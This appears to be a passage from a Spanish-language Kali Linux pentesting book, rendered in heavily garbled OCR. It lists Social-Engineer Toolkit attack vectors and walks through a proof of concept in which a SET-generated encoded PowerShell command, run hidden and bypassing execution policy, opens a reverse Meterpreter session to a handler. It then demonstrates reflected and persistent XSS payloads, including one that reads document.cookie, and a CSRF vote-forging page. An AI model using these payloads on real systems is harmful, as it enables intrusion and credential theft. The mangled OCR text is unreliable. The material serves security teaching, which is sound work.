_  A  C  CESSPOINTSSID.  Indica  que  nomhre  recibira  el  pimto  de  acceso  false  ado  con  SET. 
gs  interesante  para  ataques  de  suplantacion  de  AP  o  puntos  de  acceso*  en  los  tipicos  ataques 
Je  ingenieria  social  a  redes  Wireless. 

ME TASPL QITIFRA ME  FOR T.  Indica  el  puerto  utilizado  para  realizar  un  ataque  de 
iframe  injection  usando  la  tecnica  de  Browser  Autopwn. 

METER PRETER  MULTI  COMMANDS*  Establece  que  coman  do  s  se  quieren  ej  ecu  tar 
eiiando  una  sesion  de  Melerpreter  es  eomeguida. 

-  AUTOMIGRATE.  Si  esta  variable  se  eneuentra  activa,  cuando  se  real  ice  la  explotacion. 
cl  payload  migfdxi  automaticamente  a  otro  proceso, 

-  AUTO  DETECT.  Viene  activada  por  defeeto  y  proporciona  la  posibilidad  de  configurar 
automaticamente  la  direccion  IP  que  se  asignara  a  los  servidores  web+ 

Vectored  de  a  tuque 

1  xisten  dilcrentcs  vectores  de  ataque  proporcionados  por  SET  Cada  evoliieion  de  la  herramienta 
aport  t  nuevos  vectores  de  ataque  interesames.  En  la  version  que  viene  eon  Kali  Linux  se  pueden 
encontrar  los  siguientes  vectores  para  ingenieria  social; 

-  Spear-Phishing  Attack  Vectors .  Este  vector  de  ataque  automatiza  el  proceso  de  envio 
de  eorreos  electron icost  tanto  via  Sendmad  eomo  Gmail ,  que  1  lev  an  adjuntos  archives 
maliciosos,  los  cuales  contienen  algiin  tipo  de  exploit. 

-  Website  Attack  Vectors.  Este  vector  permite  realizar  copias  de  sitios  web  o  utilizar 
plant! lias  de  estos  con  el  objetivo  de  presentar  un  mundo  falso  a  la  victima,  lo  mas  real 
posible.  Los  clasicos  ataques  de  Jam t  Credential  Harvester  Attack  o  Tahrmbbing  son  las 
insignias  de  este  vector  de  ataque. 

Infectious  Media  Generator ,  Este  vector  de  ataque  es  uno  de  los  mas  simples  y  mas 
etectivos,  siempre  y  etiando  se  lenga  contacto  flsieo  con  la  victirna.  La  idea  es  generar  un 
payload  con  un  fichero  de  autorun ,  los  cuales  se  deben  instatar  en  un  dispositive  externo 
como  un pendrive  o  CD/DVD. 

*  Create  a  Payload  and  Listener.  Permite  generar  ejecutables  con  payloads  y  configurar 
los  listener. 

Mass  Mailer  Attack.  Este  vector  permite  realizar  envies  de  eorreos  electronicos,  ya  scan 
tn&sivos  o  dirigidos, 

dnhdm-Based Attack  Vector.  Permite  realizar  ataques  a  los  Ardu lno>  Un  vector  interesante 
e  explotar  y  que  puede  Ilamar  mucho  la  atencion  del  pentester  principiante. 
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-  SMS  Spoofing  Attack  Vector.  Permite  spoofear  el  cmisor  de  un  mensaje  SMS.  Cuando 
la  victima  reciba  el  SMS  aparece  como  emisor  oiro  numero  clistinlo  al  original,  con  esto  nl- 
pueden  reali/ar  ataques  via  SMS. 

-  Wireless  Access  Point  Attack  Vector.  Esle  vector  de  ataque  permite  crear  un  punto  de 

acceso  falso,  el  cual  simulara  una  red.  Ademas,  proporcionara  DHCP  y  DNS,  servicing 
manipulados  para  monitorizar  y  gcstionar  el  enrutamiento  de  la  victima  que  se  conecie  al 
punto  de  acceso.  j^H 

-  QRCode  Generator  Attack  Vector  El  vector  de  ataque  para  generacion  de  QRCode 
permite  al  usuario  crear  este  tipo  de  imagenes  que  pueden  ser  leidas  e  interpretadas  por 
aplicaciones  moviles.  El  objetivo  es  claro,  comeguir  quc  el  usuario  del  dispositive  movil 
acceda  a  un  sitio  web  manipulado  por  el  atacante.  o  induso  conseguir  que  este  ejecute  algo 

a  traves  del  QRCode.  ■ 

-  Power-Shell  Attack  Vectors.  Este  vector  de  ataque  que  proporciona  SET  permite  al  usuario 
crear  pequenos  scripts  que  seran  ejecutado-s  en  una  maquina  viclima  con  el  objetivo  de 
obtener  una  sesidn  inveisa  o  directa.  Estos  scripts  son  ulilizados  por  Power  Shell,  lo  ctial  es 

bastantc  interesante. 

Proof  Of  Concept:  PowerShell  y  la  puerta  de  atrAs  j 

En  esta  prueba  de  concepto  sc  propone  el  uso  de  PowerShell  para  obtener  una  sesion  de  Meterpreter, 
La  idea  es  que  el  pentester  dispone  de  acceso  llsico  a  un  equipo  que  se  csd  audilando.  y  una  via 
para  intentar  elevar  privilegios  es  obtener  una  sesion  de  Meterpreter  y  despues  probar  con  distintos 
exploits  para  elevar  los  privilegios.  El  script  que  se  debe  ejeeutar  en  una  sesion  de  PowerShell 
es  generado  por  SET  como  se  vera  a  continuation.  Hay  que  recalcar  que  por  defecto  PowerShell 
no  ejecuta  scripts,  m  locales  ni  generados  en  otras  maquinas,  por  lo  que  se  deberan  ejeeutar  las 
instrucciones  pegandolas  directamenle  en  la  linea  de  comandos.  Para  ejeeutar  SET  se  puede  utilizar 
el  comando  se-roolkit  en  una  linea  de  comandos  de  Kali  Linux  o  ejeeutar  el  script  set  que  se  encuemra 

en  la  ruia  /usr /share/set. 

Join  u  a  on  i  fc  .  f  nwnoda  -  not  in  channel  tfs0Tcotk.lt 

The  Social -Engineer  Toolkit  Is  a  product  of  TrusfedSec 
Visit:  https:  -iv.ta.  -  a 

Select  from  the  menu: 

1)  Spear -Phishing  Attack  Vectors 

2)  Website  Attack  Vector's 

31  Infectious  Media  G anuria r 

4)  Create  a  Payload  and  Listener 

5)  Mass  Mailer  Attack 

6}  Arduino  Based  Attack  Vector 

7)  SMS  Spoofing  Attack  Vector 

8)  Wireless  Access  Point  Attack  Vector 
9j  OPCode  Generator  Attack  Vector 

101  Powe retail l  Attack  Vectors 
11)  Third  Party  Modules 

9B]i  Return  back  to  the  main  menu. 


••  •"  IBi - - - 

Imagen  04.46:  Eleecioo  de  PowerShell  en  SEX 


Capitulo  IV  Exploiacion 
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f-l  menu  de  SET  presenta  los  distintos  vectores  de  ateque  que  se  pueden  configurar  a  traves  de  la 
aplicacidn.  Para  presentar  esta  prueba  de  concepto  se  utilizara  el  vector  de  ataque  de  Power  Shell 
donde  se  deberd  escoger  la  opcidn  numcro  1.  la  del  injector.  Esta  opcidn  generard  en  la  rum  usr/ 
share/set/reports  un  archive  de  texto  con  el  codigo  encodeado  y  preparado  para  set  ejecutado  en  la 
powerShell. 

1)  Powershall  Alphanumeric  Shell code  Injector 

2)  Powers  hell  Reverse  Shell 

3)  Powershell  Bind  Shell 

4)  Powershell  Dump  SAW  Database 

99 1  Return  to  Wain  Menu 

Imagen  04.4 7:  Election  de  injector  en  Power, Shell. 


Iras  la  seleccidn  del  rnetodo  de  injector  para  Power  Shell  se  debe  configurar  a  que  direccion  IP 
se  eonectara  la  sheUcode  que  va  insertada  en  el  script.  Ademas?  se  pregunta  al  ixsuario  si  quiere 
preparar  el  listener  o  handler  para  la  recihir  la  conexion.  Hay  que  reealcar  que  si  se  elige  “no”,  se 
pued  e  configurar  despues  mediante  el  modulo  de  Met  asp  la  i  t  exp  lo  if/m  1 1  Iti/han  dler. 


set : power  shell >1 

se t>  IP  address  for  the  payload  listener;  192.160,0.57 

Propping  the  payload  for  delivery  and  injecting  alphanumeric  sheUcode.,, 

Enter  the  port  number  for  the  reverse  (443]  ;  4444 
[  I  Generating  x64 -based  powershell  injection  code.,, 

[ ’ ]  Generating  x06-based  powershell  injection  code,,, 

(  I  Finished  generating  powershell  injection  bypass, 

I  Encoded  to  bypass  exececution  restriction  policy... 

1*1  If  you  want  the  powershell  commands  and  attack,  they  are  exported  to  reports 
ypowe  r shell/ 

5£-_t>  Do  you  want  to  start  the  listener  now  [yes/no]  :  :  yes 
ult;  x64] :xB6l>  Select  x86  or  x64  victim  machine  [defau 

Imagen  04.48;  Configuracion  del  pay  load y  d  handler. 

A  continuation  se  imiestra  el  aspeeto  que  tiene  el  codigo  generado  por  SET  y  almacenado  en  el 
fieliero  de  texto  en  el  directorio  reports.  Lo  interesante  de  este  codigo  es  que  se  puede  pegar  la 
instruceidn  en  una  ventana  de  PowerShell  y  aunque  la  politiea  de  ejecucion  de  scripts  sea  de  tipo 
restricted,  es  decir  no  se  ejecuta  uingiin  lipo  de  scripts  en  la  PowerShell,  al  ser  una  instruceidn  esta 
si  sera  ejecutada. 

powershell  -noprofile  -windowstyle  hidden  -noninteractive  -EncodedCommand  JAB  AG 
BAZABlACAAPQAgACcAWw8EAGwAbABJAG0AcABvAHIAdAAQACIAaw6lAHIAbg81AGwAMwAyAC4AZA3sAG 
wAIgApAF0AcABlAGlAbABpAGMAIAB£AHQAYQB0AGkAYwAgAGUAeABOAGUAcg8uACAASQBuAHOAUAB0AH 
IA[ A8WAGkAcgB0AHUAYQBsAEEAbABsAGBAYwAoAEkAbgB8AFAAdAByACAAbABwAEEAZABkAH] AZQBzAHi 
MALAAgAHUAaQ0uAHQAIA8kAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGWAYQB0AG 
kAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHOAl ABmAGwAUAHyAGBAdABlAGWAdAApADsAWwBEAGwAbABJAG 
QAcABvAHlAdAAoAClAawBlAHlAbgBlAGwAWwAyAC4AZABsAGwAlgApAF9AcABlAGlAbABpAGHAlABzAH 

Imagen  04,49:  Aspecio  de  la  instruceidn  de  PawerShell. 

Po'  ultimo  hay  que  visual  izarcomo  se  recoge  la  sesiou  de  Meterpreter  gracias  al  handler previamente 

'-°nfigurado. 
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[*|  Processing  repo  rtis/powe  rshell /p owe  rshel  1  *  rc  for  ERB  directives* 

resource  { report s/powsrslrm 11 /powe rshell > rc) >  use  mul ti/handler 

resource  { report s/powe rshell /powe rshell . rc] >  set  payload  windews/metarpreter/feu 

erse  tep  1 

sayloed  =>  windows/met  e  rp  rater/  re  verse  tep 

resource  (  report s/powe rshell/powe rshell .  rc ) >  set  Iport  4444 

Iport  =>  4444 

resource  ( repo rts/pewe rshell /powe rshell , rc ) >  sat  LHOST  0, 0.0*0 
.HOST  =>  Q. 0.S.0 

resource  ( report s/p owe rshell /powers hell  * rc) >  exploit  -j 
E'l  Exploit  running  as  background  job, 
psf  exploit (handler)  > 

l”  l  Started  reverse  handler  on  0.0.0.0:4444 

[*]  Starting  the  payload  handler.  .  . 

t“]  Sending  stage  (752128  bytes)  to  192. 16B. 0.58 

(  |  Interpreter  session  1  opened  {192.168.0.57:4444  ->  192.168*0*50:49253)  at  20 
13 “03 -26  13:40:12  +0100 


Imaged  04.50:  Sesion  de  Kfeterpreter  inverse  a  Uaves  de  PowerShell 


Capitul°  V.  Auditoria  de  aplicaciones  Web 
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Auditoria  de  aplicaciones  web 


1.  Introduction  a  las  vulnerabilidades  web 

LI  estudio  realizado  en  este  capitulo.  tiene  como  objetivo  identificar  y  explotar  las  vulnerabilidades 
mas  usuales  en  aplicaciones  web.  La  idea  final  es  ayudar  a  los  auditores.  a  dirigir  un  plan  de 
seguridad  que  permila  proveer  de  los  conceptos  necesarios.  para  llevar  a  cabo  una  auditoria  desde 
las  herramientas  incluidas  en  la  distribucion  Kali  Linux. 

I  a  previa  recoleccion  de  informacion,  mostrada  en  este  libro  dentro  del  segundo  capitulo,  sera  una 
cuestion  clave  llegados  a  este  punto  de  la  auditoria.  debido  a  que  un  Footprinting  y  Fingerprinting 
amplios,  pueden  Hegar  a  dar  unas  grandes  probabilidades  de  exito.  Dc  esta  forma  se  dara  lugar,  al 
increment©  de  detection  de  vectores  ofensivos  mas  frecuentes.  para  la  futura  realization  de  ataques 
dirigidos. 

Multiples  estudios  publicados  en  Internet,  por  diversas  empresas  relacionadas  con  temas  de 
seguridad  informatica,  apuntan  a  que  vulnerabilidades  de  Cross  Site  Scripting ,  seguidas  de  las  dc 
SQL  Injection,  abordan  la  mayor  parte  de  ataques  en  la  web.  Esto  incrementaria  la  importancia  dc 
la  implementation  de  herramientas  Web  Apiication  Firewall  (WAF),  de  cara  a  los  servicios  web. 

Actualmente  un  servidor.  sin  este  lipo  de  protecciones  y  sin  una  previa  auditoria  de  codigo,  estaria 
expuesto  a  sufirir  este  tipo  de  ataques  con  grandes  faeilidades  en  cuanto  a  lo  que  su  explotacton  se 
refiere.  del  lado  de  los  ” hackers’ No  obstante,  en  algunos  casos  es  viable  la  utilization  de  recnicas 
para  la  evasion  de  liltros,  en  caso  de  que  estos  no  se  encuentren  lo  suficientemente  revisados.  es 
posible  aprovechar  el  descuido  de  los  desarrol  I  adores  para  llevar  a  cabo  los  ataques. 


2.  Explication  de  vulnerabilidades  web  comunes 

los  medios  de  comunicacion.  tienden  a  malinterpretar  en  cierta  medida  las  noticias  referentes  a 
a  seguridad  informatica.  a!  proveer  de  informacion  a  los  usuarios.  Es  important  tener  fuentes 
altemativas  para  conseguir  material  didactico  liable,  en  lo  que  a  este  campo  se  refiere.  Un  caso 
de  desin format- ion  ,  ocurrio  en  2010  cuando  se  anuncio  a  la  pohlacion  espanola  de  un  supucsto 
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‘Hacked”  sobre  la  pdgina  de  la  prcsidencia  espanola  de  la  UE,  Nada  mas  Icjos  de  la  realidad,  se 
trataba  de  un  Cross  Site  Scripting  reflejado,  en  el  buscador  de  la  pagina,  Este  file  ditlindido  por 
di versos  mediae  como  Facebook,  Twiner  o  correos  electron  icos,  hasta  que  se  desmintio  dias  mas 
tardc,  despues  de  la  revisidn  del  servidor 


imagen  05,01 :  XSS  cn  la  pdgina  dc  la  President  ia  Eapaflola  de  la  ELL 


La  im  age  n  de  Mr  Bean,  caricaturizando  los  rasgos  de  Jose  Luis  Rodriguez  Zapatem,  no  lue  un 
autentico  defacement  con  la  consiguiente  intrusion  al  servidor,  si  no  la  modification  del  cod  i  go 
HTML  de  la  pagina  solicitada,  desde  una  URL  modificada.  A  cofltinuadon  se  muestran  los  tipos  de 
Cross  Site  Scripting  que  se  pueden  encontrar. 


Cross  Site  Scripting 

La  vufnerabilidad  de  Cross  Site  Scripting ,  conocida  comunmente  de  forma  acortada  coino  XSS, 
supone  una  serie  de  riesgos  en  todas  sus  variantes,  las  cuales  pueden  danar  principalmente  al  usuario 
y  a  la  reputacion  del  dominio  y/o  enipresa  afectada. 

Entre  otTas  cosas,  es  posibte: 

-  Realizar  ataques  de  navegacion  dirigida. 

-  Ataques  de  phising.  » 

*  I  )i  str  i  buc  ion  de  malware . 

-  Robo  de  credenciales, 

-  Ejeeucidn  de  script  uJavaScripf\ 

-  Click  Hijacking. 

-  Defacement  sin  o  con  alteration  de  la  pagina  real. 
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[  stc  tipo  de  vulnerabifidad,  puede  conllevar  a  muchos  y  nuevos  ataques  web,  debido  a  quc  im 
control  de  ejeeucion  JavaScript  sobre  el  navegador  de  una  vfetima,  abre  vectores  de  ataques  como 
yafl  bi  The  Browser" MITB*\  pudiendo  tomar  un  control  remote  del  navegador,  y  pudiendo  realizar 
ejeeuciones  de  exploits  con  el  objeto  de  realizar  una  escala  de  privilegios  en  el  sistema.  En  otros 
CBSOs,  prima  la  mgenieria  social  y  la  comuii  falta  de  conocimientos  del  usuario  afectado,  a  I  caer  en 
una  pagina  fraudulenta. 

Basicamente  sc  pueden  diferenciar  dos  tipos  de  Cross  Site  Scripting:,  Cross  Site  Scriptring  Reftejada, 
y  Cross  Site  Scripting  Persisiente. 

Cross  Site  Scripting  Reflejado 

La  explotacion  del  fallo,  se  basa  cn  la  manipulacibn  de  un  parametro  vulnerable,  con  el  objetivo  de 
montar  un  enlace  modificado  que  embeba  codigo  HTML  o  de  script,  Dentro  de  la  distribucion  Kali 
Linux ,  cs  posible  encontrar  multitud  de  herramientas  para  realizar  de  forma  comoda,  la  busqueda 
manual  de  este  tipo  de  vulnerabilidades,  mediante  la  utilizacion  de  proxy!  inverses,  Entre  las  mas 
eonocidas,  se  encuentra  la  herramienta  Burp  Sttite  y  OWASP  ZAP. 

Un  Proxy  inverse,  necesita  de  una  previa  configuracicSn  en  el  navegador,  desde  la  cuai  sc  conectara 
al  Proxy  local,  para  realizar  capturas  del  trifico  web  mediante  punios  de  interrupcidn.  El  navegador 
por  defecto  en  Kali  Linux ,  es  Jce Weasel,  un  proyecto  derivado  de  Mozilla  Firefox,  el  cual  dista  poco 
en  cuanto  a  configuraeiones  de  este  tipo. 

CtmnHllDfl  irtllraji 

Configure  Proxies  Co  Access  the  Interne! 

O  Na 

O  Auto- detect  proxy  settings  for  this  network 
v  O  Use1  system  proxy  settings 
Manuel  proxy  cnnfigufatkin: 


HTTP  Proxy 

local  host 

Port 

ftOaft  ;; 

Use  this  proxy  server  for  alt  protocols 

SSL  P- osfyr 

Port 

°r 

FTP  Proxy; 

Port 

r  ■ g 

SOCKS  Host: 

. }  1  '  1 

Port 

0  t 

SOCKS  v4  *  SOCKS  yS 

No  Pro* y  for 


fximpiii:  ffioiiUi.org.  nat  nt,  192  16ft  \  QfH 
^utg-matic  proxy  conf  iqgr  alion  URL; 

r~~ - — ~ 

t±»4> 

- I  „ - 


Cancel 


OK 


Imaged  05.02:  Configuration  de  Proxy  en  he  Weasel. 
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Una  vez  realizado  el  paso  de  configuration  en  fee  Weasel*  el  navegador  estard  preparado  para  em  iLir 
las  peticiones  web,  a  iraves  del  “ Proxy  inverso’'.  Bn  este  caso,  se  realizard  la  prueba  con  OWASP 
ZAP,  miereeptando  una  petition  HTTP,  en  la  cual  sc  envia  el  parimetro  “user  \  que  recuge  el 
usuarto  “Admin”  y  lo  muestra  en  pantalla.  4 


Images  05,03:  OWASP  ZAP  mterceptando  petiunn  GET 


Se  podria  trabajar  dc  lorma  sencilla  con  todo  tipo  de  petietones,  en  caso  de  encontrarse  con  una 
petition  POST,  esta  aplieacidn  se  eneargaria  de  mterceptarla  y  permiltria  modificar  al  vuelo 
sus  parametros  Ademas  esta,  cilenta  con  una  pestana  de  respuesta  la  cual,  aun  no  interpretando 
JavaScript,  seria  posible  leer  el  codigo  de  la  pagina  devuelta,  con  lo  que  serf  a  viable  identical  un 
posible  Cross  Site  Scripting.  A  continuadom  se  muestra  una  imagen  con  la  respuesta  vista  desde 
OWASP  ZAP,  modificando  la  recog i da  del  anterior  valor  "Admin”  por  el  de  un  Tag  Script. 

|  Quick  St-art  j^ei  ldAnZ|~pe^|ftjgst3  ]  F  unto  tie  iptefrutieian 
;  Header:  \rtsta  Ran*  *  Body:  Vtfla  Rw  *  .Z)  < _ j 

-  —  — _ _  .  i  >  —  -  —  -  —  _  . .  -  *  — - - 

HTTF/1, 1  OK 

I  Date;  TUe,  2S  Mar  2013  I4:53:fl2  GMT 

Server :  Apache/2,2,11  (Win32j  mod_Gsl/2.2. II  OpenSSL/D-9-B-i  PHP/5,2.Q 
X-Powered  By:  PHP/5.2,3 
Content  Length:  224 
Keep-Alive:  tiinetiut*=5*  majr=10Q 
Connection;  Koep  Alive 
, Content-Type:  text/html 

. . . .  E  |  ,  _ r  *  r '  BBS 

■*httnl> 

f^ti  http  eqyivs1  Content  Type*  contentT"t«Kt/htmi:  chjr«at=3  so- gabs.  1"» 
da  OermAn  SAnchwc/title^ 

Bi*nv«nide  UBuirio  script  -elert  ( *  XiiS1  K/icript*l  + 
j*:/heid> 

Ldbedy» 

5</bady» 

|</htmU _ _ _ _ 

Imogen  05,04:  OWASP  ZAP  y  Cross  Site  Scripting  Reflejado. 


Visto  desde  el  navegador  de  IceWeaseL  el  JavaScript  seria  interpretado  de  la  siguiente  man  era 
ejecutandose  la  siguiente  alerta  en  pantalla. 
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Sltlo  d#  ■Sermon  SAncKfri  -  kfrwMiirl 
frl*  View  Hijiisfy  geickmarki*  ToaU  Help 

C  frt'O  a*  G#rm*n  5*neh*i!  fe,  ..  — ^ 


pup ’unr •  ,p  r*  »i»  m  x  y '  > •  o  (F  «i 

||Off*hMVii  Security  \  Krtb  UPlwd  \Kit*  Dki  iQlEKpi aii  DB  V Alroj^kTig 


iTnnifer  rirvg  di!i  fr&rn  AnCknyn-Dg*, 

Imagen  05.05:  Cross  Site  Scripting  Refiejado  en  fee  Weasel. 
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Cross  Site  Scripting  Persistente 

Fsle  tipo  de  Cross  Site  Scripting ,  queda  normal  mente  registrado  en  una  base  de  datos.  ai  realizar 
una  peticion  malmtencionada  Iras  Linos  parametros  mal  filtrados.  La  recogida  del  contenido  de  la 
petition,  posteriormente  es  rescatada  de  los  dates  almacenados  y  estos  vuelven  a  ser  mostrados* 
Dichos  dates  son  interpretados  y  ejecutados  en  el  navegador  de  la  vfetima, 


Para  realizar  las  pruebas,  se  utilizari  la  herramienta  Burp  Suite  en  su  version  gratuita,  disponible  en 
Kali  /  inux.  C  on  esia  herramienta,  se  puede  inleractuar  eon  las  peticiones  interceptadas,  permitiendo 
in  iarlas  a  diferentes  lierramieutas  como  un  Spider*  tin  Intruder  o  el  conocido  Repeater  enire  otras, 
La  herramienta  Repeater }  pennite  realizar  repeticiones  sotafe  peticiones  capturadas.  En  el  siguiente 
ejemplo  se  muestra  como  se  almacena  el  nombre  de  una  ciudad  en  una  base  de  datos,  mediante  una 
peticion  GET. 


1  Target  |  5pid«*  tfcannar  lirtrucei  |  g  =  UTdi,E,  |  Deigd-sr 

Comparer  iioimns  Alerts 

V  1  | 

ft  «•  i  mi -41  #s 

ft 

.  Ha*  1  P  ara  ms  Headers  He*  1 

1.  . .  . J - -J - . - . - - - 

Gbl  ^ruebasfK5s_p/3csfi  .,req^t'Q  php7eiudad=:Madfd  HTTP/L 1 

Hast:  4rt0nym0ua 

^3 er- Agent  Moz  lia/S.EJ  (XlLj  Linux  -636  fV.lfl.Q]  Gacka/2Q  1DQ 1C1  Firdoj(/],e.O  kewtfe&sel/l&.G  1 

Ac  cept  Laxt^hlnnkap  plitatrenftthlml + xml. at]  pi,  cai  lon/vn] ;q = 0 ,  S.  *F  ;q=  t)  8 
Accept -Language  *n-U£.«n.:q  =  0,5 

Accent  bntodrg.  gzip.  deflate 

Cenr.actign:  ksrup- alive 

i  ’  i  4  H  *  IS  *  II!  . 

R^tpunitf 

N«v  j  Mender*  j  Ik-  j 

-FTTP/l  1  300  OK 

3at*:Tu*.  2(  M*f  2013  10:1^46  GMT 

5*rvir:  Apache/2.2.11  (Win3?1  mgd_aitf2  7  1  \  fwpfl.J.s 

Powered- fly:  PHP/5.2.9 

Content’ Lvngth;  32  ^ 

teep-ftl  vfl  timeout =5,  mair=  100 

Connection  Keep-Alw 

Content- !Vpe  text/html 

L.a  ciudad  Madrid  ha  tido  nrabada 

Imogen  05.06:  Inciuyendo  Madrid  en  la  BBDD. 
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Ademas.  este  dominio  cuenta  con  un  PUP  para  extraer  los  nonibres  de  ias  ciudades  y  mostrarlns. 
Este  tipo  de  cjemplos,  es  posible  verlos  en  los  registros  a  paginas,  en  los  que  se  introducen  datos  de 
pertil  quo  mas  tarde  son  rescatados  y  expuestos  a  los  usuarios. 


Imager  05,07:  Extraccidn  de  la  ciudad  de  la  base  de  daios. 

Si  e!  PUP  cncargatio  dd  almaccnamiento  del  nombre  de  la  ciudad,  no  Ultra  correctameiUe  el 
parimetro  “ciudad- podria  darse  el  caso  de  que  un  atacante  modificase  la  ciudad  por  cod i go 
HTM I  y  este  se  insertase  integro  en  la  base  de  datos.  El  Cross  Site  Scripting  hasta  este  momento  no 
existiria.  dcbido  a  que  el  segundo  factor  es  el  PUP  de  extraccidn,  si  ambos  carecen  de  filtrados,  se 
daria  el  Cross  Site  Scripting  Persistente. 


Imagen  05. OR.  Extraccion  de  imager  de  ta  base  de  datos. 
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Com^  sc  observa  on  el  codigo  fuente  de  respuesta,  ha  sido  posible  embeber  una  imagen,  que, 
rcru|enzada  desde  el  propio  Burp  Suite  o  visualizada  desde  tin  navegador,  se  veria  como  un 

defacement  real. 

Fit*  f dn  Viuw  History  Qookim-iKfcfr  Toots  Help 
[  http7/4nQnymO  ..echo  php?td-  30 


qp  «§?  4nOnyirOLtsyprij*has/j<ss_jj/xss_^th'j  pMp?id=  30 


Imagen  (15.09:  Imagen  render! /ada. 


I  s  posible  eneonlrar  este  tipo  de  vulnerabilidades,  distribuidas  en  casi  cualquier  parte  que  componga 
una  peticidn  HTTP,  Desde  los  diferentes  metodos,  iipos  de  cabeceras  que  impriman  texto,  ataques 
(  R  LI  o  inclusive  explotando  XSS  mediante  ataques  Remote  Fite  Include. 

La  protection  de  cara  al  usuario,  se  rige  principalmente  por  las  vers  ion  es  y  tipos  de  tiavegadores 

ulilizados. 

Internet  Explorer  incluyo  protecciones  contra  ataques  XSS  a  partir  de  la  version  8.  Google  Chrome 
tambien  propuso  su  propio  filtro  para  evitarlos,  a  partir  de  la  version  11.0  inclusive,  aunque  en  estos 
casos  las  protecciones.  se  basan  en  evitar  ataques  reflejados.  Mozilla  Firefox  sin  embargo,  no  uriliza 
por  defecto  ninguna  protection,  de  la  misma  manera  que  Ice  Weasel  en  Kali  Linux,  no  obstante  es 
posible  descargar  el  complemento  NoScript  en  am  bos  easos,  el  cual  proves  al  navegador  de  una 
proteccion  mas  potente  ante  la  ejecucion  de  cualquier  tipo  de  script. 

viable  la  busqueda  de  medidas  evasivas  ante  este  tipo  de  fibres.  Existen  multitud  de  documentor 
f-ti]  Internet,  conocidos  como  “cheat  sheet”  los  cualcs  explican  como  conseguir  la  ejecucion  de 
•hmiSeript  con  estas  protecciones  en  navegadores  seguros, 

Un  ejeniplo  sencillo  podria  ser  el  siguiente: 

un  usuario  malintencionado  man i pula  el  parametro  vulnerable  de  una  pagina,  (el  cual  se  embebe 
Centro  de  un  JavaScript  por  deseuido  del  desarrollador),  sera  posible  explotar  el  fallo  que  se  pueda 
pfovocar,  sin  que  los  filtros  de  los  que  disponga  el  navegador  se  percaten. 
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Penh-'sthig  conJCnh  1 


GET  /17Se8Q97957lJaientdocument<cooki8)/  HTTP/1,1 
Holt; 

U$er-Ag®nt:  Mozilla/5,0  (K1  lj  Linux  i©B6:  rv;18  D)  Gecko/20100101  Firefox/18.G  Iceweasei/IB ,0,1 
Act  ept :  t  a  *t/ht  m I ,  a  p  pk  at  j  o  n/xht  ml + xm  I ,  a  p  plic  at  i  o n/lcml  ;q  =  0  9  *r  W =  0 . 8 
Accept  Language:  arvUS.en:q=0-S 

Accept- Encoding ;  azio.  deflate _ 

LiJ  LiJ  i..l  j  [i  >  j  j  Type  a  search  term 


Response 


Raw 


Headers 


Hex  ]  HTML 


Render 


< script  type =' "text/j a va script u>war  _gaq  -  gaq  |[  []; 

gaq.push([  set Accouni',  UA-2 1250067-1']); 
gaq.  pugh([JtrackPageLoadTfcne']); 
gaq.push([  _setDomainName'#  'twoo.com']  J; 

_gaq.pu*h([  _trackPagevjew%7publ(Cprofile?',alert[dot:umeiit. cookie),"]); 
_gaq.puiht[  _setCustomV*r  ,  1,  "Isjogged  in  age",  "  YE5  64",  1]}; 
_gaq.pushf['  set  Gust  omVar,  2,  "avatar",  "YES*,  1]); 

_gaq.push(['  setCustomVar’,  4,  "bought  credits'1,  "NO\  1]); 
_gaq.push(['_setCustomVar,  5,  "gender",  " MALE",  1]): 


Image?!  OS.  10:  Cross  Site  Scripting  eo  navegadores  seguros. 


Por  todo  lo  indicado  os  altamcnte  recomendable  para  fortificar  un  servidor,  llevar  a  cabo  auditor  (as  ik 
forma  periodica,  do  iu  parte  web,  del  codigo  fuente*  aderrtas  de  revisar  actualizaciones  del  software 
instalado  y  del  sistema operalivo,  Utt  punto  extra*  seria  la  Impkmentacidn  de  aplicaciones  WA f\  que 
actien  como  firewall  a  nivel  de  servicio. 


Cross  Site  Request  Forgery  m 

Este  ataque.  fuerza  a  la  \  ictima  a  realizar  aeeiones  no  deseadas  en  una  aplicacion,  la  cual  no  realize 
un  buen  empleo  de  las  tokens  de  sesion  para  identificar  a  I  usuano  que  la  ejecuta,  Este  tipo  de 
vulnefabilidades  afeetan  a  todo  lipo  de  aplieaeiones.  entre  los  objetivos  mas  carmines  se  enctieniran 
aquellos  destinados  a  sistemas  de  reeoleccion  de  votes  o  de  la  publication  de  contenidos  eon  lines 
de  spam. 


Para  realizar  un  ejemplo  practice,  se  expone  a  continuacion  una  pagina,  desde  la  que  una  peticion 
POST  oculta  tras  el  senuelo  de  una  irnagen,  la  realizacion  de  votos  online  sin  el  consent!  mien  to  del 
usuario  afectado,  sobre  otra  web. 

Otra  de  las  herramientas  mteresantes  que  propone  Kali  Linux,  es  Vega  en  su  version  TO  creado 
por  la  empresa  Subgraph.  Esta  se  com  pone  de  dos  funcionalidades  clave,  por  un  lado  un  escaner 
de  vulnerabilidades  y  por  otro  la  funcion  de  Proxy  que  de  igual  manera  que  en  las  anieriores 
herramiemas.  servira  para  incluir  puntos  de  intermpeion  en  las  petic tones.  En  este  caso  sc  tendra 
control  del  llamado  Request  Editor,  para  realizar  ei  envio  manual  de  peticiones. 

La  siguiente  imagen  muestra  el  contenido  de  respucsta  HTML,  como  resultado  dc  la  peticion  a  un  M 
pagina  atacante  la  cual,  aloja  una  peticion  POST  para  un  sistema  de  voiaciones. 
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Imugen  05.1 1 :  Request  Editor  cn  Vega  E(k 

Como  se  observa  en  d  codigo,  d  even  to  onmottseover  se  encarga  de  llaimu  a  ]a  funei6n  send 
d  contenido  de  form.  Este  JavaScript  rediirecciona  ul  usuario  victims,  hacia  la  pagina  en 
la  cuai  existe  el  CSRF,  al  pasar  el  niton  por  encima  de  la  imagen  contact/ se  ejecuta  el  evenlo  y  se 
envfa  la  peticion  POST, 


ejecutando 


La  sigmente  imagen  muestra  la  votacion  realizada  con  £xito. 


BT  VS  KALE  -  To  Votacl6n  -  k*weas*t 
File  Edit  Vrew  »-Hstory  Bookmarks  loots 

[Sbtvs  KAU 

«■  H 


- 1 


WWW  I 


comA-.t-vj,  -ka!« 


-  7' 


v 


! Most  Visited^  p| Offensive  Security  Kill  Unu*  <alJ  Docs  Qf  xptoit-DB  %  Aij-crsrfe-rrg 


|GnCtU  por  LI  VO  10' 


4^ 


mt 


J-U5U 


1  □  Vo|wf  J  Crw  urw  wWtun  Jjj  Dmuodv 


